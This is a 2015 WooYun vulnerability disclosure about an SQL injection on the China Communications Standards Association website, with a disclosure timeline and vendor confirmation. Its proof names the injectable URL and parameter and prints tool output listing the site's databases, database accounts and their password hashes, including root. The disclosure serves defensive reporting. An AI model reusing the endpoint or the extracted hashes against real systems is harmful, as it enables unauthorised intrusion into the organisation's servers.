当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0128609

漏洞标题:中国通信标准化协会主站高危注入(3)

相关厂商:cncert国家互联网应急中心

漏洞作者: MT哥

提交时间:2015-07-23 15:12

修复时间:2015-09-11 08:46

公开时间:2015-09-11 08:46

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-23: 细节已通知厂商并且等待厂商处理中
2015-07-28: 厂商已经确认,细节仅向厂商公开
2015-08-07: 细节向核心白帽子及相关领域专家公开
2015-08-17: 细节向普通白帽子公开
2015-08-27: 细节向实习白帽子公开
2015-09-11: 细节向公众公开

简要描述:

暴力的注入!

详细说明:

http://www.ccsa.org.cn/tc/baopi.php?baopi_id=4640

漏洞证明:

[12:06:32] [INFO] fetching database names
available databases [44]:
[*] article
[*] auth
[*] ccsa_access_log
[*] ccsadoc
[*] client_update
[*] customer
[*] del_mladvert
[*] del_ptpic
[*] del_pw_log
[*] del_style
[*] del_test
[*] del_tmparticle
[*] doc
[*] fileopen
[*] ftpusers
[*] good_member
[*] gsc15
[*] information_schema
[*] IOofCOM
[*] jiaoliu
[*] log
[*] logs
[*] lost+found
[*] maintain
[*] meeting
[*] ml4ccsa
[*] ml4ptsn
[*] mnogosearch
[*] mysql
[*] phpmyadmin
[*] prod
[*] prodex
[*] questionnaire
[*] sales
[*] shenbao
[*] std
[*] std_temp
[*] stdcd
[*] tc485
[*] test
[*] tlc
[*] tspc
[*] userstd
[*] vpopmail
database management system users password hashes:
[*] auth_rd [1]:
password hash: 300582b60d0ce39f
[*] auth_rw [1]:
password hash: 7363df490bd6e5ee
[*] backup [1]:
password hash: 6360f4a4380593b6
[*] ccsa_rd [1]:
password hash: 694bf0e84e1746b6
[*] ccsa_rw [1]:
password hash: 0bbe89a47b7e9f94
[*] doc_rd [1]:
password hash: 6f8c7ba26dfd93fe
[*] doc_rw [1]:
password hash: 67c4ea1842a027a1
[*] ftp [1]:
password hash: 654925394d80d5e4
[*] infosrv [1]:
password hash: 1c9c80061d48e945
[*] log_rd [1]:
password hash: 408efbf60d3c8899
[*] log_rw [1]:
password hash: 32a437f543402d9c
[*] mailuser [1]:
password hash: 14780cf32b1ea347
[*] maint_rw [1]:
password hash: 7f38034b3972ae37
[*] mepadmin [1]:
password hash: 6fc780f149d98015
[*] minfosrv [1]:
password hash: 6c90aa2604862b9b
[*] mlog [1]:
password hash: 06988dd331f93204
[*] mproduct [1]:
password hash: 32099b90045157c1
[*] mptpic [1]:
password hash: 773359240eb9a1d9
[*] mptqc [1]:
password hash: 0107187807836006
[*] mptsn_auth [1]:
password hash: 57cf2b7f207cc98c
[*] prod_rd [1]:
password hash: 7ac54f89754e39ab
[*] prod_rw [1]:
password hash: 3d4faebb32aedf8c
[*] ptpic [1]:
password hash: 0206b55f23e2e967
[*] ptpic_rd [1]:
password hash: 34bba4f421608fb9
[*] ptpic_rw [1]:
password hash: 5b85aec77f441075
[*] ptqc [1]:
password hash: 6ec627e402484936
[*] ptqc_rd [1]:
password hash: 58eba2fc22d22204
[*] ptqc_rw [1]:
password hash: 326fd13f1db64eba
[*] ptsn_auth [1]:
password hash: 362f29946e86ae30
[*] readall [1]:
password hash: 13f162af21797902
[*] root [1]:
password hash: 0af4727b4f928228
[*] shouli [1]:
password hash: 1f1d533a5b0f5247
[*] shouli_rd [1]:
password hash: 472c940019929961
[*] shouli_rw [1]:
password hash: 5bd622e73f6459c9
[*] std_rd [1]:
password hash: 12e8cd2f1c97b82d
[*] std_rw [1]:
password hash: 4b31b6b72a2ffa73
[*] tlcadmin [1]:
password hash: 0c979a9e1a1a7df0
[*] tlcwebuser [1]:
password hash: 0c979a9e1a1a7df0
[*] userstd_rw [1]:
password hash: 57aec995239e6fc7
[*] vpopmail [1]:
password hash: 38755f107acb1b50
database management system users [40]:
[*] 'auth_rd'@'localhost'
[*] 'auth_rw'@'localhost'
[*] 'backup'@'%'
[*] 'ccsa_rd'@'localhost'
[*] 'ccsa_rw'@'localhost'
[*] 'doc_rd'@'localhost'
[*] 'doc_rw'@'localhost'
[*] 'ftp'@'127.0.0.1'
[*] 'infosrv'@'localhost'
[*] 'log_rd'@'localhost'
[*] 'log_rw'@'localhost'
[*] 'mailuser'@'%'
[*] 'maint_rw'@'localhost'
[*] 'mepadmin'@'localhost'
[*] 'minfosrv'@'localhost'
[*] 'mlog'@'localhost'
[*] 'mproduct'@'localhost'
[*] 'mptpic'@'localhost'
[*] 'mptqc'@'localhost'
[*] 'mptsn_auth'@'localhost'
[*] 'prod_rd'@'localhost'
[*] 'prod_rw'@'localhost'
[*] 'ptpic'@'localhost'
[*] 'ptpic_rd'@'localhost'
[*] 'ptpic_rw'@'localhost'
[*] 'ptqc'@'localhost'
[*] 'ptqc_rd'@'localhost'
[*] 'ptqc_rw'@'localhost'
[*] 'ptsn_auth'@'localhost'
[*] 'readall'@'localhost'
[*] 'root'@'localhost'
[*] 'shouli'@'localhost'
[*] 'shouli_rd'@'localhost'
[*] 'shouli_rw'@'localhost'
[*] 'std_rd'@'localhost'
[*] 'std_rw'@'localhost'
[*] 'tlcadmin'@'localhost'
[*] 'tlcwebuser'@'localhost'
[*] 'userstd_rw'@'localhost'
[*] 'vpopmail'@'localhost'

修复方案:

waf+过滤

版权声明:转载请注明来源 MT哥@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-28 08:44

厂商回复:

CNVD确认所述情况,已由CNVD通过网站管理方)公开联系渠道向其邮件通报。

最新状态:

暂无